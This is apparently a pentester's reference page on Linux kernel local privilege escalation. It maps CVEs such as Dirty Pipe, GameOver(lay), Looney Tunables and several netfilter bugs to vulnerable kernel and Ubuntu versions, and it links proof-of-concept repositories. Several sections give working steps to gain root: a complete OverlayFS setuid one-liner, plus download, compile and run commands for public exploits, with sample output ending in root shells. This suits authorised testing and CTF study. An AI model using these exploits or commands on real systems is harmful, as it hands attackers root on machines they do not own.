# Kernel Exploits

[![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA)

## Linux Kernel Version

```shell-session
$ uname -a

Linux NIX02 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
```

Linux Kernel 4.4.0-116

```shell-session
$ uname -r

5.10.5-051005-generic
```

```shell-session
$ cat /etc/lsb-release 

DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04.4 LTS"
```

{% hint style="info" %}
*Kernel exploits can cause system instability so use caution when running these against a production system.*
{% endhint %}

### Google "Linux Kernel XXX exploit" and/or "OS XXX exploit"


### Linux Exploit Suggester

{% embed url="<https://github.com/The-Z-Labs/linux-exploit-suggester/blob/master/linux-exploit-suggester.sh>" %}


### Metasploit - Local Exploit Suggester

{% embed url="<https://www.infosecmatter.com/metasploit-module-library/?mm=post/multi/recon/local_exploit_suggester>" %}

## DirtyFrag

{% embed url="<https://github.com/V4bel/dirtyfrag>" %}

## Fragnesia

{% embed url="<https://github.com/v12-security/pocs/tree/main/fragnesia>" %}

## ssh-keysign-pwn

{% embed url="<https://github.com/0xdeadbeefnetwork/ssh-keysign-pwn>" %}

## CVE-2026-31431 - CopyFail

{% embed url="<https://github.com/theori-io/copy-fail-CVE-2026-31431>" %}

{% embed url="<https://github.com/badsectorlabs/copyfail-go>" %}


## Universal local privilege escalation - CVE-2024-1086 - Linux kernels between v5.14 and v6.6

Affects Linux kernels between v5.14 and v6.6, including Debian, Ubuntu, and KernelCTF.

**See Releases:**

{% embed url="<https://github.com/Notselwyn/CVE-2024-1086>" %}

## DirtyCow - Linux Kernel 2.6.22 < 3.9

{% embed url="<https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs>" %}

{% embed url="<https://www.exploit-db.com/exploits/40839>" %}

## Linux Kernel 4.4.0-116

{% embed url="<https://vulners.com/zdt/1337DAY-ID-30003>" %}

```shell-session
$ gcc kernel_exploit.c -o kernel_exploit && chmod +x kernel_exploit
```

```shell-session
$ ./kernel_exploit 

task_struct = ffff8800b71d7000
uidptr = ffff8800b95ce544
spawning root shell
```

## Ubuntu 21.10 with kernel 5.13.0-37

{% embed url="<https://github.com/Bonfee/CVE-2022-0995>" %}


## Ubuntu - CVE-2021-3493 OverlayFS

* Ubuntu 20.10
* Ubuntu 20.04 LTS
* Ubuntu 19.04
* Ubuntu 18.04 LTS
* Ubuntu 16.04 LTS
* Ubuntu 14.04 ESM

{% embed url="<https://github.com/briskets/CVE-2021-3493>" %}

## CVE-2022-23222 - Linux Kernel eBPF Local Privilege Escalation

Linux kernel through 5.15.14

{% embed url="<https://github.com/tr3ee/CVE-2022-23222>" %}

## CVE-2022-0995

The exploit targets Ubuntu 21.10 with kernel `5.13.0-37`

{% embed url="<https://github.com/Bonfee/CVE-2022-0995>" %}

## Ubuntu - CVE-2023-32629 & CVE-2023-2640

```
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;
setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("id")'
```

{% embed url="<https://x.com/liadeliyahu/status/1684841527959273472?s=19&t=puhDAlZCy_75s7UbdV-bFw>" %}

{% embed url="<https://github.com/ThrynSec/CVE-2023-32629-CVE-2023-2640---POC-Escalation>" %}

## GameOver(lay) Ubuntu PrivEsc - CVE-2023-2640 & CVE-2023-32629

| Kernel version | Ubuntu release                                                    |
| -------------- | ----------------------------------------------------------------- |
| 6.2.0          | Ubuntu 23.04 (Lunar Lobster) / Ubuntu 22.04 LTS (Jammy Jellyfish) |
| 5.19.0         | Ubuntu 22.10 (Kinetic Kudu) / Ubuntu 22.04 LTS (Jammy Jellyfish)  |
| 5.4.0          | Ubuntu 22.04 LTS (Focal Fossa) / Ubuntu 18.04 LTS (Bionic Beaver) |

{% embed url="<https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629>" %}

## CVE-2023-35001

Kernel 5.19.0-35

{% embed url="<https://github.com/synacktiv/CVE-2023-35001>" %}

{% embed url="<https://0xdf.gitlab.io/2024/04/13/htb-hospital.html#cve-2023-35001>" %}

## CVE-2023-0386 - OverlayFS vulnerability

Kernel versions lower than 6.2 (Ubuntu 22.04).

{% embed url="<https://github.com/xkaneiki/CVE-2023-0386>" %}

{% embed url="<https://securitylabs.datadoghq.com/articles/overlayfs-cve-2023-0386/>" %}

{% embed url="<https://0xdf.gitlab.io/2023/06/07/htb-twomillion.html#shell-as-root>" %}

Ubuntu 22.04

{% embed url="<https://github.com/sxlmnwb/CVE-2023-0386>" %}

## CVE-2023-32233

Linux kernel through 6.3 - Tested on Ubuntu 23.04 (Lunar Lobster).

{% embed url="<https://github.com/Liuk3r/CVE-2023-32233>" %}

## CVE-2023-4911 - Looney Tunables

Fedora 37 and 38, Ubuntu 22.04 and 23.04, and Debian 12 and 13

{% embed url="<https://github.com/leesh3288/CVE-2023-4911>" %}

{% embed url="<https://blog.qualys.com/vulnerabilities-threat-research/2023/10/03/cve-2023-4911-looney-tunables-local-privilege-escalation-in-the-glibcs-ld-so>" %}

## Ubuntu 24.04

{% embed url="<https://snyk.io/fr/blog/abusing-ubuntu-root-privilege-escalation/?s=03>" %}

## Dirty Pipe - 5.8 to 5.17

All kernels from version `5.8` to `5.17`

{% embed url="<https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits>" %}

```shell-session
$ git clone https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits.git
$ cd CVE-2022-0847-DirtyPipe-Exploits
$ bash compile.sh
```

### Exploit 1

```shell-session
$ ./exploit-1

Backing up /etc/passwd to /tmp/passwd.bak ...
Setting root password to "piped"...
Password: Restoring /etc/passwd from /tmp/passwd.bak...
Done! Popping shell... (run commands now)

id

uid=0(root) gid=0(root) groups=0(root)
```

### Exploit 2

```shell-session
$ find / -perm -4000 2>/dev/null

/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/Xorg.wrap
/usr/sbin/pppd
/usr/bin/chfn
/usr/bin/su
/usr/bin/chsh
/usr/bin/umount
/usr/bin/passwd
/usr/bin/fusermount
/usr/bin/sudo
/usr/bin/vmware-user-suid-wrapper
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/pkexec
/usr/bin/newgrp
```

```shell-session
$ ./exploit-2 /usr/bin/sudo

[+] hijacking suid binary..
[+] dropping suid shell..
[+] restoring suid binary..
[+] popping root shell.. (dont forget to clean up /tmp/sh ;))

# id

uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),120(lpadmin),131(lxd),132(sambashare),1000(cry0l1t3)
```

## Netfilter

### **CVE-2021-22555 - 2.6 - 5.11**

Vulnerable kernel versions: 2.6 - 5.11

```shell-session
$ uname -r

5.10.5-051005-generic
```

{% embed url="<https://github.com/google/security-research/tree/master/pocs/linux/cve-2021-22555>" %}

```shell-session
$ wget https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
$ gcc -m32 -static exploit.c -o exploit
$ ./exploit

[+] Linux Privilege Escalation by theflow@ - 2021

[+] STAGE 0: Initialization
[*] Setting up namespace sandbox...
[*] Initializing sockets and message queues...

[+] STAGE 1: Memory corruption
[*] Spraying primary messages...
[*] Spraying secondary messages...
[*] Creating holes in primary messages...
[*] Triggering out-of-bounds write...
[*] Searching for corrupted primary message...
[+] fake_idx: fff
[+] real_idx: fdf

...SNIP...

root@ubuntu:/home/cry0l1t3# id

uid=0(root) gid=0(root) groups=0(root)
```

### **CVE-2022-25636 - 5.4 - 5.6.10**

Linux kernel 5.4 through 5.6.10

```shell-session
$ uname -r

5.13.0-051300-generic
```

{% embed url="<https://github.com/Bonfee/CVE-2022-25636>" %}

```shell-session
$ git clone https://github.com/Bonfee/CVE-2022-25636.git
$ cd CVE-2022-25636
$ make
$ ./exploit

[*] STEP 1: Leak child and parent net_device
[+] parent net_device ptr: 0xffff991285dc0000
[+] child  net_device ptr: 0xffff99128e5a9000

[*] STEP 2: Spray kmalloc-192, overwrite msg_msg.security ptr and free net_device
[+] net_device struct freed

[*] STEP 3: Spray kmalloc-4k using setxattr + FUSE to realloc net_device
[+] obtained net_device struct

[*] STEP 4: Leak kaslr
[*] kaslr leak: 0xffffffff823093c0
[*] kaslr base: 0xffffffff80ffefa0

[*] STEP 5: Release setxattrs, free net_device, and realloc it again
[+] obtained net_device struct

[*] STEP 6: rop :)

# id

uid=0(root) gid=0(root) groups=0(root)
```

### CVE-2022-1015 - 5.12 - 5.17

Kernels after commit 345023b0db31 (v5.12) but before commit 6e1acfa387b9 (v5.17) are vulnerable.

{% embed url="<https://github.com/pqlx/CVE-2022-1015>" %}

### **CVE-2023-32233 - Up to 6.3.1**

Linux Kernel up to version `6.3.1`

{% embed url="<https://github.com/Liuk3r/CVE-2023-32233>" %}

```shell-session
$ git clone https://github.com/Liuk3r/CVE-2023-32233
$ cd CVE-2023-32233
$ gcc -Wall -o exploit exploit.c -lmnl -lnftnl
```

```shell-session
$ ./exploit

[*] Netfilter UAF exploit

Using profile:
========
1                   race_set_slab                   # {0,1}
1572                race_set_elem_count             # k
4000                initial_sleep                   # ms
100                 race_lead_sleep                 # ms
600                 race_lag_sleep                  # ms
100                 reuse_sleep                     # ms
39d240              free_percpu                     # hex
2a8b900             modprobe_path                   # hex
23700               nft_counter_destroy             # hex
347a0               nft_counter_ops                 # hex
a                   nft_counter_destroy_call_offset # hex
ffffffff            nft_counter_destroy_call_mask   # hex
e8e58948            nft_counter_destroy_call_check  # hex
========

[*] Checking for available CPUs...
[*] sched_getaffinity() => 0 2
[*] Reserved CPU 0 for PWN Worker
[*] Started cpu_spinning_loop() on CPU 1
[*] Started cpu_spinning_loop() on CPU 2
[*] Started cpu_spinning_loop() on CPU 3
[*] Creating "/tmp/modprobe"...
[*] Creating "/tmp/trigger"...
[*] Updating setgroups...
[*] Updating uid_map...
[*] Updating gid_map...
[*] Signaling PWN Worker...
[*] Waiting for PWN Worker...

...SNIP...

[*] You've Got ROOT:-)

# id

uid=0(root) gid=0(root) groups=0(root)
```

## CVE-2025-38001

Debian 12 PoC

{% embed url="<https://github.com/0xdevil/CVE-2025-38001>" %}

## Interesting Books

{% content-ref url="/pages/VVT5FQq9z62bWoNAWCUS" %}
[Interesting Books](/0xss0rz/interesting-books.md)
{% endcontent-ref %}

{% hint style="info" %}
**Disclaimer**: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.
{% endhint %}

* [**The Web Application Hacker’s Handbook**](https://www.amazon.fr/dp/1118026470?tag=0xss0rz-21) The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more.
* [**Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities**](https://www.amazon.fr/dp/1718501544?tag=0xss0rz-21) Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them.
* [**Real-World Bug Hunting: A Field Guide to Web Hacking**](https://www.amazon.fr/dp/1593278616?tag=0xss0rz-21) Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.

## Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.

[![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA)

[![buymeacoffee](https://cdn.buymeacoffee.com/buttons/v2/default-yellow.png)](https://buymeacoffee.com/0xss0rz)
